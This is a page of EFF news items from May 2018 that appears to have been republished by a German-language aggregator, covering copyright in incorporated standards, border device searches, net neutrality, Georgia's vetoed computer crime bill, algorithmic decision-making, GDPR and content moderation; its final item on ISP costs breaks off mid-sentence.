Industry Groups' Lawsuit Threatens Public.Resource.org's Online Archives of Laws Washington, D.C.-On Monday, May 14, at 9:30 am, EFF Legal Director Corynne McSherry will argue in court that the public has a right to access, copy, and share the law—and industry groups that helped develop certain legal rules can't inhibit that right by claiming ownership in those rules. EFF represents Public.Resource.org, a website by a nonprofit organization that works to improve public access to government documents, including our laws. To fulfill that mission, it acquires and posts online a wide variety of public documents, including regulations that are initially created through private standards organizations but later incorporated into mandatory federal and state law. Public.Resource.org was sued by six huge private industry groups that work on fire, safety, energy efficiency, and educational testing standards. The industry groups claim copyright over parts of laws—published online by Public.Resource.org—that began as private standards, and they claim they can decide who can access and copy that law, and on what terms. McSherry will urge the U.S. Court of Appeals for the D.C. Circuit to overturn a lower court ruling that threatens to shut down Public.Resourceorg's online archive of laws. Private organizations must not be allowed to abuse copyright to control who can read and speak the law, or where and how laws can be accessed. What: Hearing in ASTM v. Public.Resource.org When: Monday, May 14, 9:30 am Where: U.S. Court of Appeals for the D.C. Circuit E. Barrett Prettyman U.S. Courthouse Courtroom 31 333 Constitution Ave., NW Washington, DC 20001 For more information on this case: https://www.eff.org/cases/publicresource-freeingthelaw Contact:  Corynne McSherry Legal Director corynne@eff.org Mitch Stoltz Senior Staff Attorney mitch@eff.org
>> mehr lesen

FanFlick Editor: an entry in the Catalog of Missing Devices from an EFF supporter (Do, 10 Mai 2018)
You wonderful EFF supporters keep on coming up with great new entries to our Catalog of Missing Devices, which lists fictional devices that should exist, but don't, because to achieve their legal, legitimate goals, the manufacturer would have to break some Digital Rights Management and risk retaliation under Section 1201 of the Digital Millennium Copyright Act. Now, EFF supporter Rico Robbins has sent us the "FanFlick Editor," a welcome addition to the Catalog, alongside of Dustin Rodriguez's excellent list of missing devices like the Software Scalpel and MovieMoxie; and Benjamin MacLean's Mashup Maker. If you have your own great ideas for additions, send them to me and maybe you'll see them here on Deeplinks! Meet the FanFlick Editor. With this revolutionary video editor, you can directly rip your favorite movies from DVDs or Blu-rays or even digital copies from iTunes, Google Play, and any other service. Edit the film to your heart's content and then distribute the edit decision list (EDL) -- a file that contains instructions that other people can use to edit their own copies during playback while they watch, so they can experience your vision for the movies you both love (or even the ones you hate!). Used your own footage, graphics, or audio? No problem! FanFlick Editor keeps track of what you made and what you ripped, and packages up your other content with your FanFlick EDL. That way, you only distribute material whose copyright you control, or that is in the public domain, or that fair use permits. Sharing edit decision lists is fair use and thus legal -- that's how ClearPlay do business -- so we're free to provide you with a useful, flexible tool like FanFlick Editor.
>> mehr lesen

EFF and ACLU Can Proceed With Legal Challenge Against Warrantless Searches of Travelers' Smartphones, Laptops (Do, 10 Mai 2018)
Court Rejects DHS's Attempt to Have Case Dismissed Boston, Massachusetts—The Electronic Frontier Foundation (EFF), the American Civil Liberties Union (ACLU), and the ACLU of Massachusetts won a court ruling today allowing their groundbreaking lawsuit challenging unconstitutional searches of electronic devices at the U.S. border to proceed—a victory for the digital rights of all international travelers. EFF and ACLU represent 11 travelers—10 U.S. citizens and one lawful permanent resident—whose smartphones and laptops were searched without warrants at the U.S. border. The case, Alasaad v. Nielsen—filed in September against the Department of Homeland Security—asks the court to rule that the government must have a warrant based on probable cause before conducting searches of electronic devices, which contain highly detailed personal information about people’s lives. The case also argues that the government must have probable cause to confiscate a traveler’s device. A federal judge in Boston today rejected DHS’s request throw the case out, including the argument that dismissal was justified because the plaintiffs couldn’t show they faced substantial risk of having their devices searched again. Four plaintiffs already have had their devices searched multiple times. "This is a big win for the digital rights of all international travelers," said EFF Staff Attorney Sophia Cope. "The court has rejected the government's motion to dismiss all claims in the case, so EFF and ACLU can move ahead to prove that our plaintiffs’ Fourth and First Amendment rights were violated when their devices were seized and searched without a warrant.” “The court has rightly recognized the severity of the privacy violations that travelers face when the government conducts suspicionless border searches of electronics,” said ACLU attorney Esha Bhandari, who argued the case last month. “We look forward to arguing this case on the merits and showing that these searches are unconstitutional.” Immigration and Customs Enforcement (ICE) policy allows border agents to search and confiscate anyone’s device for any reason or for no reason at all. Customs and Border Protection (CBP) policy allows border device searches without a warrant or probable cause, and usually without even reasonable suspicion. Last year, CBP conducted more than 30,000 border device searches, more than triple the number just two years earlier. For the ruling: https://www.eff.org/document/alasaad-v-nielsen-order-denying-defendants-motion-dismiss For more on this case: https://www.eff.org/cases/alasaad-v-duke Below is a full list of the plaintiffs along with links to their individual stories, which are also collected here: Ghassan and Nadia Alasaad are a married couple who live in Massachusetts, where he is a limousine driver and she is a nursing student. Suhaib Allababidi, who lives in Texas, owns and operates a business that sells security technology, including to federal government clients. Sidd Bikkannavar is an optical engineer for NASA’s Jet Propulsion Laboratory in California. Jeremy Dupin is a journalist living in Massachusetts. Aaron Gach is an artist living in California. Isma’il Kushkush is a journalist living in Virginia. Diane Maye is a college professor and former captain in the U. S. Air Force living in Florida. Zainab Merchant, from Florida, is a writer and a graduate student in international security and journalism at Harvard. Akram Shibly is a filmmaker living in New York. Matthew Wright is a computer programmer in Colorado For the court ruling: https://www.eff.org/document/alasaad-v-nielsen-order-denying-defendants-motion-dismiss For more on border searches: https://www.eff.org/wp/digital-privacy-us-border-2017 For more ACLU information on this case: https://www.aclu.org/news/aclu-eff-sue-over-warrantless-phone-and-laptop-searches-us-border   Contact:  Adam Schwartz Senior Staff Attorney adam@eff.org Sophia Cope Staff Attorney sophia@eff.org
>> mehr lesen

Fourth Circuit Rules That Suspicionless Forensic Searches of Electronic Devices at the Border Are Unconstitutional (Do, 10 Mai 2018)
In a victory for privacy rights at the border, the U.S. Court of Appeals for the Fourth Circuit today ruled that forensic searches of electronic devices carried out by border agents without any suspicion that the traveler has committed a crime violate the U.S. Constitution. The ruling in U.S. v. Kolsuz is the first federal appellate case after the Supreme Court’s seminal decision in Riley v. California (2014) to hold that certain border device searches require individualized suspicion that the traveler is involved in criminal wrongdoing. Two other federal appellate opinions this year—from the Fifth Circuit and Eleventh Circuit—included strong analyses by judges who similarly questioned suspicionless border device searches. EFF filed an amicus brief in Kolsuz arguing that the Supreme Court’s decision in Riley supports the conclusion that border agents need a probable cause warrant before searching electronic devices—whether manually or with forensic software—because of the unprecedented and significant privacy interests travelers have in their digital data. In Riley, a case that involved manual searches, the Supreme Court followed similar reasoning and held that police must obtain a warrant to search the cell phone of an arrestee. As Hamza Kolsuz prepared to board a flight to Turkey at Washington Dulles International Airport, border agents searched his luggage and found that he was attempting to export firearms parts without a U.S. license. Border agents then confiscated his iPhone and manually searched it. They subsequently arrested Kolsuz and conducted a second search of his iPhone, this time using a forensic tool by the company Cellebrite. This forensic search produced “an 896-page report that included Kolsuz’s personal contact lists, emails, messenger conversations, photographs, videos, calendar, web browsing history, and call logs, along with a history of Kolsuz’s physical location down to precise GPS coordinates,” according to the court’s opinion. The Fourth Circuit’s ruling applies only to forensic, not manual, searches of electronic devices at the border because Kolsuz only challenged the use of the evidence obtained from the forensic search of his cell phone in his prosecution. “We have no occasion here to consider whether Riley calls into question the permissibility of suspicionless manual searches of digital devices at the border,” the court said. While we're heartened that the Fourth Circuit left open the possibility that manual searches may also require individualized suspicion, we disagree with the court’s unsupported statement that “the distinction between manual and forensic searches is a perfectly manageable one,” given that manual searches of electronic devices enable government agents to access virtually the same personal information as forensic searches. EFF has long argued that border agents need a warrant from a judge, based on probable cause of criminality, to conduct electronic device searches of any kind. The Supreme Court’s pre-Riley case law, however, permits warrantless and suspicionless “routine” searches of items like luggage that travelers carry across the border, a rule known as the border search exception to the Fourth Amendment’s warrant requirement. Based on these pre-Riley cases, the government claims it has the power to search and confiscate travelers’ cell phones, tablets, and laptops at airports and border crossings for no reason or any reason, and without judicial oversight. The Kolsuz court recognized the unique privacy interests that travelers have in their digital data and thus held, “particularly in light of the Supreme Court’s decision in Riley,” that forensic border device searches are “non-routine” searches that require “some form of individualized suspicion.” The Fourth Circuit quoted Supreme Court precedent and concluded that forensic border device searches are “highly intrusive” searches that infringe the “dignity and privacy interests” of individuals. The court noted, “The key to Riley’s reasoning is its express refusal to treat [cell] phones as just another form of container….” Importantly, the Fourth Circuit also left open the possibility that forensic border device searches may require the highest standard of individualized suspicion under the Fourth Amendment: “What precisely that standard should be—whether reasonable suspicion is enough… or whether there must be a warrant based on probable cause… is a question we need not resolve.” Unfortunately for Kolsuz, the Fourth Circuit did not suppress the 896-page report that resulted from the warrantless forensic search of his cell phone. The court held that the border agents reasonably relied upon existing case law “allowing warrantless border searches of digital devices that are based on at least reasonable suspicion,” and that the firearms parts that were found in his luggage supported reasonable suspicion that his cell phone contained evidence that Kolsuz was involved in “ongoing efforts to export contraband illegally.” While we would have liked to see the Fourth Circuit go further by expressly requiring a warrant for all border device searches, we’re optimistic that we can win such a ruling in our civil case with ACLU against the U.S. Department of Homeland Security, Alasaad v. Nielsen, challenging warrantless border searches of electronic devices.
>> mehr lesen

Red Alert for Net Neutrality: Tell Congress to Save the Open Internet Order (Mi, 09 Mai 2018)
In December, the FCC voted to end the 2015 Open Internet Order, which prevented Internet service providers (ISPs) like AT&T and Comcast from violating net neutrality principles. A simple majority vote in Congress can keep the FCC’s decision from going into effect. From now until the Senate votes, EFF, along with a coalition of organizations, companies, and websites, is on red alert and calling on you to tell Congress to vote to restore the Open Internet Order. The Congressional Review Act (CRA) allows Congress to overturn an agency rule using a simple majority vote. It likewise only requires 30 signatures in order to force a vote. The petition to force the vote was delivered today. That means we’re likely to see the Senate—which has only been only one vote away from restoring net neutrality protections for quite a while—vote in mid-May. That gives us time to make sure our voices are heard. You can see where your representatives stand and then give them a call. Tell them you to use the CRA to restore net neutrality protections. Take Action Save the net neutrality rules
>> mehr lesen

Catalog of Missing Devices: Arielle (Mi, 09 Mai 2018)
Today's world of amazing technology owes its existence to the low cost of entry: anyone can make anything and bring it to the world to see if it catches on. From emoji to email, the web to Netflix, the permissionless technology world lets us turn today's improbable idea into tomorrow's billion-dollar business. So yeah: adaptive, automated soundtracks for your ebooks, mining your music library for exactly the right track to play to enhance the mood of the fiction you're reading, scene by scene and song by song. All it takes is the right idea, and the right to get around the DRM on those ebooks.
>> mehr lesen

Victory! Georgia Governor Vetoes Short-Sighted Computer Crime Bill (Di, 08 Mai 2018)
Recognizing the concerns of Georgia’s cybersecurity sector, Gov. Nathan Deal has vetoed a bill that would have threatened independent research and empowered dangerous “hack back” measures. S.B. 315 would have created the new crime of “unauthorized access” without any requirement that the defendant have fraudulent intent. This could have given prosecutors the discretion to target independent security researchers who uncover security vulnerabilities, even when they have no criminal motives and intend to disclose the problems ethically. The bill also included a dangerous exemption for “active defense measures.” “After careful review and consideration of this legislation, including feedback from other stakeholders, I have concluded more discussion is required before enacting this cybersecurity legislation,” Gov. Deal wrote in his veto message. He added: Under the proposed legislation, it would be a crime to intentionally access a computer or computer network with knowledge that such access is without authority.  However, certain components of the legislation have led to concerns regarding national security implications and other potential ramifications.  Consequently, while intending to protect against online breaches and hacks, SB 315 may inadvertently hinder the ability of government and private industries to do so. With EFF’s support, Electronic Frontiers Georgia, a member of the Electronic Frontier Alliance, mobilized at every stage of the legislative process. They met with members of the state senate and house, “worked the rope” (a term for waiting outside the legislative chambers for lawmakers to emerge), held up literal “red cards” during hearings, and hosted a live stream panel. Nearly 200 Georgia residents emailed the governor demanding a veto, while 55 computer professionals from around the country submitted a joint letter of opposition.  Professors organized at Georgia Tech to call upon the governor to veto the bill.  EFF congratulates EF Georgia and its crew of dedicated advocates for their hard work defeating S.B. 315. We also thank Gov. Deal for doing right by Georgia’s booming cybersecurity industry—and users everywhere—by vetoing this bill.  
>> mehr lesen

Math Can’t Solve Everything: Questions We Need To Be Asking Before Deciding an Algorithm is the Answer (Mo, 07 Mai 2018)
Across the globe, algorithms are quietly but increasingly being relied upon to make important decisions that impact our lives. This includes determining the number of hours of in-home medical care patients will receive, whether a child is so at risk that child protective services should investigate, if a teacher adds value to a classroom or should be fired, and whether or not someone should continue receiving welfare benefits.  The use of algorithmic decision-making is typically well-intentioned, but it can result in serious unintended consequences. In the hype of trying to figure out if and how they can use an algorithm, organizations often skip over one of the most important questions: will the introduction of the algorithm reduce or reinforce inequity in the system? There are various factors that impact the analysis. Here are a few that all organizations need to consider to determine if implementing a system based on algorithmic decision-making is an appropriate and ethical solution to their problem: Will this algorithm influence—or serve as the basis of—decisions with the potential to negatively impact people’s lives? Before implementing a decision-making system that relies on an algorithm, an organization must assess the potential for the algorithm to impact people’s lives. This requires taking a close look at who the system could impact and what that would look like, and identifying the inequalities that already exist in the current system—all before ever automating anything. We should be using algorithms to improve human life and well-being, not to cause harm. Yet, as a result of bad proxies, bias built into the system, decision makers who don’t understand statistics and who overly trust machines, and many other challenges, algorithms will never give us “perfect” results. And given the inherent risk of inequitable outcomes, the greater the potential for a negative impact on people’s lives, the less appropriate it is to ask an algorithm to make that decision—especially without implementing sufficient safeguards.  In Indiana, for example, after an algorithm categorized incomplete welfare paperwork as “failure to cooperate,“ one million people were denied access to food stamps, health care, and cash benefits over the course of three years. Among them was Omega Young, who died on March 1, 2009 after she was unable to afford her medication; the day after she died, she won her wrongful termination appeal and all of her benefits were restored. Indiana’s system had woefully inadequate safeguards and appeals processes, but the the stakes of deciding whether someone should continue receiving Medicaid benefits will always be incredibly high—so high as to question whether an algorithm alone should ever be the answer.  Virginia Eubanks discusses the failed Indiana system in Automating Inequality, her book about how technology affects civil and human rights and economic equity. Eubanks explains that algorithms can provide “emotional distance” from difficult societal problems by allowing machines to make difficult policy decisions for us—so we don’t have to. But some decisions cannot, and should not, be delegated to machines. We must not use algorithms to avoid making difficult policy decisions or to shirk our responsibility to care for one another. In those contexts, an algorithm is not the answer. Math alone cannot solve deeply-rooted societal problems, and attempting to rely on it will only reinforce inequalities that already exist in the system. Can the available data actually lead to a good outcome? Algorithms rely on input data—and they need the right data in order to function as intended. Before implementing a decision-making system that relies on an algorithm, organizations need to drill down on the problem they are trying to solve and do some honest soul-searching about whether they have the data needed to address it. Take, for example, the department of Children, Youth and Families (CYF) in Allegheny County, Pennsylvania, which has implemented an algorithm to assign children “threat scores” for each incident of potential child abuse reported to the agency and help case workers decide which reports to investigate—another case discussed in Eubanks’ book. The algorithm’s goal is a common one: to help a social services agency most effectively use limited resources to help the community they serve. To achieve their goal, the county sought to predict which children are likely to become victims of abuse, i.e., the “outcome variable.” But the county didn’t have enough data concerning child-maltreatment-related fatalities or near fatalities to create a statistically meaningful model, so it used two variables that it had a lot of data on—community re-referrals to the CYF hotline and placement in foster care within two years—as proxies for child mistreatment. That means the county’s algorithm predicts a child’s likelihood of re-referral and of placement in foster care, and uses those predictions to assign the child a maltreatment “threat score.” The problem? These proxy variables are not good proxies for child abuse. For one, they are subjective. As Eubanks explains, the re-referral proxy includes a hidden bias: “anonymous reporters and mandated reporters report black and biracial families for abuse and neglect three and a half more often than they report white families"— sometimes even by angry neighbors, landlords, or family members making intentionally false reports as punishment or retribution. As she wrote in Automating Inequality, “Predictive modeling requires clear, unambiguous measures with lots of associated data in order to function accurately.” Those measures weren’t available in Allegheny County, yet CYF pushed ahead and implemented an algorithm anyway.  The result? An algorithm with limited accuracy. As Eubanks reports, in 2016, a year with 15,139 reports of abuse, the algorithm would have made 3,633 incorrect predictions. This equates to the unwarranted intrusion into and surveillance of the lives of thousands of poor, minority families. Is the algorithm fair? The lack of sufficient data may also render the application of an algorithm inherently unfair. Allegheny County, for example, didn’t have data on all of its families; its data had been collected only from families using public resources—i.e., low-income families. This resulted in an algorithm that targeted low-income families for scrutiny, and that potentially created feedback loops, making it difficult for families swept up into the system to ever completely escape the monitoring and surveillance it entails. This outcome offends basic notions of what it means to be fair.  It certainly must not feel fair to Allegheny County families adversely impacted. There are many measures of algorithmic fairness. Does the algorithm treat like groups similarly, or disparately? Is the system optimizing for fairness, for public safety, for equal treatment, or for the most efficient allocation of resources? Was there an opportunity for the community that will be impacted to participate in and influence decisions about how the algorithm would be designed, implemented, and used, including decisions about how fairness would be measured? Is there an opportunity for those adversely impacted to seek meaningful and expeditious review, before the algorithm has caused any undue harm? Organizations should be transparent about the standard of fairness employed, and should engage the various stakeholders—including (and most importantly) the community that will be directly impacted—in the decision about what fairness measure to apply. If the algorithm doesn’t pass muster, it should not be the answer. And in cases where a system based on algorithmic decision-making is implemented, there should be a continuous review process to evaluate the outcomes and correct any disparate impacts. How will the results (really) be used by humans? Another variable organizations must consider is how the results will be used by humans. In Allegheny County, despite the fact that the algorithm’s “threat score” was supposed to serve as one of many factors for caseworkers to consider before deciding which families to investigation, Eubanks observed that “in practice, the algorithm seems to be training the intake workers.” Caseworker judgment had, historically, helped counteract the hidden bias within the referrals. When the algorithm came along and caseworkers started substituting their own judgment with that of the algorithm, they effectively relinquished their gatekeeping role and the system became more class and race biased as a result Algorithmic-decision making is often touted for its superiority over human instinct. The tendency to view machines as objective and inherently trustworthy—even though they are not— is referred to as “automation bias.” There are of course many cognitive biases at play whenever we try to make a decision; automation bias adds an additional layer of complexity. Knowing that we as humans harbor this bias (and many others), when the result of an algorithm is intended to serve as only one factor underlying a decision, an organization must take care to create systems and practices that control for automation bias. This includes engineering the algorithm to provide a narrative report rather than a numerical score, and making sure that human decision makers receive basic training both in statistics and on the potential limits and shortcomings of the specific algorithmic systems they will be interacting with.  And in some circumstances, the mere possibility that a decision maker will be biased toward the algorithm’s answer is enough to counsel against its use. This includes, for example, in the context of predicting recidivism rates for the purpose of determining prison sentences. In Wisconsin, a court upheld the use of the COMPAS algorithm to predict a defendant’s recidivism rate on the ground that, at the end of the day, the judge was the one making the decision. But knowing what we do about the human instinct to trust machines, it is naïve to think that the judge’s ‘inherent distraction’ was not unduly influenced by the algorithm. One study on the impact of algorithmic risk assessments on judges in Kentucky found that algorithms only impacted judges’ decision making for a short time, after which they return to previous habits, but the impact may be different across various communities of judges, and adversely impacting even one person is a big deal given what’s at stake—lost liberty. Given the significance of sentencing decisions, and the serious issues with trying to predict recidivism in the first place (the system “essentially demonizes black offenders while simultaneously giving white criminals the benefit of the doubt”), use of algorithms in this context is inappropriate and unethical. Will people affected by these decisions have any influence over the system? Finally, algorithms should be built to serve the community that they will be impacting—and never solely to save time and resources at whatever cost. This requires that data scientists take into account the fears and concerns of the community impacted. But data scientists are often far removed from the communities in which their algorithms will be applied. As Cathy O’Neil, author of Weapons of Math Destruction, told Wired earlier this year, “We have a total disconnect between the people building the algorithms and the people who are actually affected by them.” Whenever this is the case, even the most well-intended system is doomed to have serious unintended side effects.  Any disconnect between the data scientists, the implementing organization, and the impacted community must be addressed before deploying an algorithmic system. O’Neil proposes that data scientists prepare an “ethical matrix” taking into account the concerns of the various stakeholders that may be impacted by the system, to help “lay out all of these competing implications, motivations and considerations and allows data scientists to consider the bigger impact of their designs.” The communities that will be impacted should also have the opportunity to evaluate, correct, and influence these systems. *** As the Guardian has noted, “Bad intentions are not needed to make bad AI.” The same goes for any system based on algorithmic decision-making. Even the most well-intentioned systems can cause significant harm, especially if an organization doesn’t take a step back and consider whether it is ethical and appropriate to use algorithmic decision-making in the first place. These questions are just starting points, and they won’t guarantee equitable results, but they are questions that all organizations should be asking themselves before implementing a decision-making system that relies on an algorithm.  
>> mehr lesen

Why Am I Getting All These Terms of Service Update Emails? (Mo, 07 Mai 2018)
Anyone looking at their inbox in the last few months might think that the Internet companies have collectively returned from a term-of-service writers' retreat. Company after company seem to have simultaneously decided that your privacy is tremendously important to them, and collectively beg you take a look at their updated terms of service and privacy policies. You might assume that this privacy rush is connected to the ongoing Cambridge Analytica scandal, and Mark Zuckerberg's recent face-off with Congress. It's certainly true that Facebook itself has been taking some voluntary steps to revamp its systems in direct response to pressure from politicians in the U.S. and abroad. But most of the companies that are sending you email right now are doing so because of their own, independent privacy spring-cleaning. And that's almost entirely due to Europe's General Data Protection Regulation (GDPR), which comes into force on May 25th. Most companies that have users in Europe are scrambling to update their privacy policies and terms of service to avoid breaking this new EU law. The GDPR strongly encourages clarity in "information addressed to the public" about privacy—making now an excellent time for companies to provide clearer and more detailed descriptions of what data they collect, and what use they put it to. Then again, those updates might be a little overdue. Companies were always supposed to do this under European law—and, for that matter, Californian law too, which since 2003 has required any service that collects your private information to spell out in detail out their data use. But the additional penalties of the GDPR (with fines of up to 20 million euro, or 4% of global revenue) and increasing confidence of European data protection regulators have poked many international companies to finally pay closer attention to their legal obligations. The EU regulators are certainly paying attention to these email updates. A strongly-worded blog post this week by EU's head enforcer, European Data Protection Supervisor (EDPS) Giovanni Buttarelli, warned the public and his fellow regulators to be "vigilant about attempts to game the system", adding that some of these new terms of service emails could be "travest[ies] of the spirit of the new regulation". What To Look For So what might you look for in these changes? What are the potential good points, and where might Buttarelli's travesties be hiding? First, it depends on where you're living. Companies aren't under a legal obligation to implement the GDPR's provisions for all their users. You may even be able to see those new geographical distinctions in their changed terms. People in Europe (not just EU citizens) must be protected under the new law, but it's an open question whether Americans or those outside both regions will get the same treatment. You should be able to tell the details of those differences from the new policies. (Or not: Facebook, for instance, is only showing its new, detailed legal justifications for its data collection to users in Europe, and hiding that page from other users.) Some of the changes may just involve refinements in terminology. What companies have to do to comply with the GDPR, for instance, greatly depends on whether they're "data controllers" or "data processors" – roughly speaking, whether they have the responsibility to manage your data, or whether they're just handling it on behalf of another party. You may well see some frantic games of pass-the-parcel in the next few weeks as different services attempt to minimize or share their compliance burden. You can spot that in how they describe who is the "data controller" in their terms. For instance, Etsy, whose users are both buyers and sellers, has changed its language to emphasize that sellers are independent data controllers of your data. Google, meanwhile, has provoked a furious response from Europe's media publishers, after it declared itself the controller for the data from the ads and trackers that publishers put on their own websites, but expected that the publishers were the ones responsible for obtaining consent to share this data. Some of the other changes have a more immediate, positive result, though. The GDPR is an embodiment of the data protection rights spelled out in the EU's Charter of Fundamental Human Rights, which states: Everyone has the right to the protection of personal data concerning him or her... Such data must be processed fairly for specified purposes and on the basis of the consent of the person concerned or some other legitimate basis laid down by law. Everyone has the right of access to data which has been collected concerning him or her, and the right to have it rectified. When it comes to changes in these terms, most of the work will be spelling out those "specified purposes" in more detail, as well as explaining why the company thinks they can legitimately process it under the GDPR. But there may also be changes in your ability to look at the data itself, and change it. For instance, Twitter users can now peer at the full pile of data that that company has picked up on them from their tweets and cross-referenced advertisers databases. You can also delete data that you don't want Twitter to keep using. That right of access also means that you can take your information with you. Under the GDPR, companies have to provide "data portability"—which means that they should provide you with your data in a way that lets you easily move it to a competing service – at least if you are in Europe. Again, some companies have already offered this ability. Google has offered "Google Takeout", Facebook its archive download feature, and Twitter its tweet archive. But their implementations have often been patchy and incomplete. Now more companies will provide these data dumps. The pre-existing services have already markedly improved. For users in the EU, they should also offer a way to truly and permanently delete your account and all its data. Still, these are the kind of user-empowering features that some companies would rather you didn't know too much about, so don't be surprised if the only news you hear about them comes from poring over these changes to long documents. As Buttarelli says, such "legal cover" might well be against the spirit of the GDPR, but it's going to take a while for companies, regulators, and privacy groups to establish what the law's sometimes ambiguous statements really mean. One particularly knotty problem is whether the language that many of these emails use ("by using our service, you agree to these terms") will be acceptable under the GDPR. The regulation is explicit that in many areas, you need to give informed, unambiguous consent by "a statement or clear affirmative action." Even more significantly, if the data being collected by a company isn't necessary for the service it is offering, under the GDPR the company should give covered users the option to decline that data collection, but still allow them to use the service. That's what the EDPS is complaining about when he says that some of these terms of service updates could be "travesties". If they are, you might find some more emails updates in your inbox. And so could the companies sending them—from the EU's data protection regulators.
>> mehr lesen

EFF and Coalition Partners Push Tech Companies To Be More Transparent and Accountable About Censoring User Content (Mo, 07 Mai 2018)
Groups Release Specific Guidelines Addressing Shoddy, Opaque Private Censorship Washington, D.C.—The Electronic Frontier Foundation (EFF) called on Facebook, Google, and other social media companies today to publicly report how many user posts they take down, provide users with detailed explanations about takedowns, and implement appeals policies to boost accountability. EFF, ACLU of Northern California, Center for Democracy & Technology, New America’s Open Technology Institute, and a group of academic experts and free expression advocates today released the Santa Clara Principles, a set of minimum standards for tech companies to augment and strengthen their content moderation policies. The plain language, detailed guidelines call for disclosing not just how and why platforms are removing content, but how much speech is being censored. The principles are being released in conjunction with the second edition of the Content Moderation and Removal at Scale conference. Work on the principles began during the first conference, held in Santa Clara, California, in February. “Our goal is to ensure that enforcement of content guidelines is fair, transparent, proportional, and respectful of users’ rights,” said EFF Senior Staff Attorney Nate Cardozo. In the aftermath of violent protests in Charlottesville and elsewhere, social media platforms have faced increased calls to police content, shut down more accounts and delete more posts. But in their quest to remove perceived hate speech, they have all too often wrongly removed perfectly legal and valuable speech. Paradoxically, marginalized groups have been especially hard hit by this increased policing, hurting their ability to use social media to publicize violence and oppression in their communities. And the processes used by tech companies are tremendously opaque. When speech is being censored by secret algorithms, without meaningful explanation, due process, or disclosure, no one wins. “Users deserve more transparency and greater accountability from platforms that play an outsized role—in Myanmar, Australia, Europe, and China, as well as in marginalized communities in the U.S. and elsewhere—in deciding what can be said on the Internet,” said Jillian C. York, EFF Director for International Freedom of Expression. “Users need to know why some language is allowed and the same language in a different post isn’t. They also deserve to know how their posts were flagged—did a government flag it, was it flagged by the company itself? And we all deserve a chance to appeal decisions to block speech.” “The Santa Clara Principles are the product of years of effort by privacy advocates to push tech companies to provide users with more disclosure and a better understanding of how content policing works,” said Cardozo. “Facebook and Google have taken some steps recently to improve transparency, and we applaud that. But it’s not enough. We hope to see the companies embrace the Santa Clara Principles and move the bar on transparency and accountability even higher.” The three principles urge companies to: publish the number of posts removed and accounts permanently or temporarily suspended due to violations of their content guidelines; provide clear notice to all users about what types of content are prohibited, and clear notice to each affected user about the reason for the removal of their content or the suspension of their account; and provide human review of content removal by someone not involved in the initial decision, and enable users to engage in a meaningful and timely appeals process for any content removals or account suspensions. The Santa Clara Principles continue EFF’s work advocating for free expression online and greater transparency about content moderation. Since 2015 EFF has been collecting reports of online takedowns through its Onlinecensorship.org project, which shines a light on what content is take down, why companies make certain decisions about content, and how content takedowns are affecting communities of users around the world. EFF’s annual Who Has Your Back report, which started in 2010, has revealed which companies are the best and worst at disclosing when they give user’s private information to the government. This year’s Who Has Your Back report will focus exclusively on private censorship issues. Future projects will examine transparency about content policing policies, with the Santa Clara Principles used as a benchmark for the minimum standards companies should have in place. “Content takedown and account deactivation practices can have a profound effect on the lives and work of individuals in different parts of the world,” said York, cofounder of Onlinecensorship.org. “The companies removing online speech should be up front about their content policing policies. Users are being kept in the dark, voices that should be heard are being silenced forever by automation, and that must change.” Santa Clara Principle participants: ACLU Foundation of Northern California Center for Democracy & Technology Electronic Frontier Foundation New America’s Open Technology Institute Irana Raicu (Markkula Center for Applied Ethics, Santa Clara University) Nicolas Suzor (Queensland University of Technology) Sarah T. Roberts (Department of Information Studies, School of Education & Information Studies, UCLA) Sarah Myers West (USC Annenberg School for Communications and Journalism) For the text of the principles: https://newamericadotorg.s3.amazonaws.com/documents/Santa_Clara_Principles.pdf For more on content moderation: https://www.eff.org/deeplinks/2018/01/private-censorship-not-best-way-fight-hate-or-defend-democracy-here-are-some Contact:  Nate Cardozo Senior Staff Attorney nate@eff.org Jillian C. York Director for International Freedom of Expression jillian@eff.org
>> mehr lesen

The Big Lie ISPs Are Spreading in State Legislatures Is That They Don’t Make Enough Money (Fr, 04 Mai 2018)
In their effort to prevent states from protecting a free and open Internet, a small handful of massive and extraordinarily profitably Internet service providers (ISPs) are telling state legislatures that network neutrality would hinder their ability to raise revenues to pay for upgrades and thus force them to charge consumers higher bills for Internet access. This is because state-based network neutrality will prohibit data discrimination schemes known as “paid prioritization” where the ISP charges websites and applications new tolls and relegate those that do not pay to the slow lane. In essence, they are saying they have to charge new fees to websites and applications in order to pay for upgrades and maintenance to their networks. In other words, people are using so much of their broadband product that they can’t keep up on our monthly subscriptions. Nothing could be further from the truth. Today in America we have ISPs that are already deploying 21st-century high-speed broadband without resorting to violating network neutrality or monetizing our personal information with advertisers. The fact is nothing—and certainly not a lack of funds—prevents incumbents from upgrading their networks and bringing a vast majority of American cities they serve into the 21st century of Internet access. That means gigabit broadband services anywhere between $40 to $70 a month (the range people in the handful of competitive markets pay today). Yet, year after year, these ISPs have pocketed billions in profits and it is not until they face competition from a rival provider that they upgrade their networks. Ultimately, it’s not network neutrality that prevents the large ISPs from upgrading their networks while lowering prices. It is a lack of incentive. The Biggest Cost For An ISP is the Initial Deployment, Not Internet Usage ISPs misrepresent to policymakers the true cost drivers of broadband deployment as a way to stave off pro-consumer protections. In fact, the biggest cost barrier for an ISP’s creation is the initial construction of the network (as opposed to its future upgrades) and the civil works that entails. That is what the Google Fiber deployment has taught us and that is what studies in the European Union concluded when analyzing how to improve the market entry prospects of ISPs. Some estimates suggest the cost of deployment can be close to 80 percent of the entire cost portfolio of an ISP. Note that means operations and maintenance of the network (that includes all of the broadband usages of its customers) could be as little as 20% of the ISP’s costs. This is acutely true when it comes to a fiber to the home deployment where the infrastructure (fiber optic cable) is effectively future-proof and can be upgraded cheaply with advances in electronics. It is worth remembering that our current incumbent telephone and cable companies have made back their initial investment costs because they entered the market as monopolies in the old days and likely enjoyed favorable financing as safe bets (nothing is safer to invest in than a monopoly). Our current incumbents enjoyed a litany of advantages for being the first to deploy. For example, many buildings as they were constructed prospectively required the installation of a telephone and cable line, which in essence gave them virtually a free ride to customers that new entrants will not enjoy. This is also why it has been very hard to get new competition because they have to navigate the infrastructure deployment and rights-of-way from a very different position. Another example, when Google was deploying its fiber network in Austin, Texas, it needed to run its wires along the telephone pole system. Unfortunately for Google, AT&T owned many of those poles and simply denied them access to build in their entirety. This is a big reason why many small ISPs supported the FCC’s 2015 Open Internet Order because it guaranteed them rights to access infrastructure if it was owned by an incumbent and prohibited by law the conduct AT&T exhibited in Austin, Texas. The World’s Fastest ISP Adheres to Network Neutrality and Privacy and Still Makes a Profit In addition to ISPs not needing new huge sums of money to upgrade and operate their networks, we have a case study that shows that adhering to network neutrality principles while also respecting user privacy by not monetizing their personal information doesn’t prevent ISPs 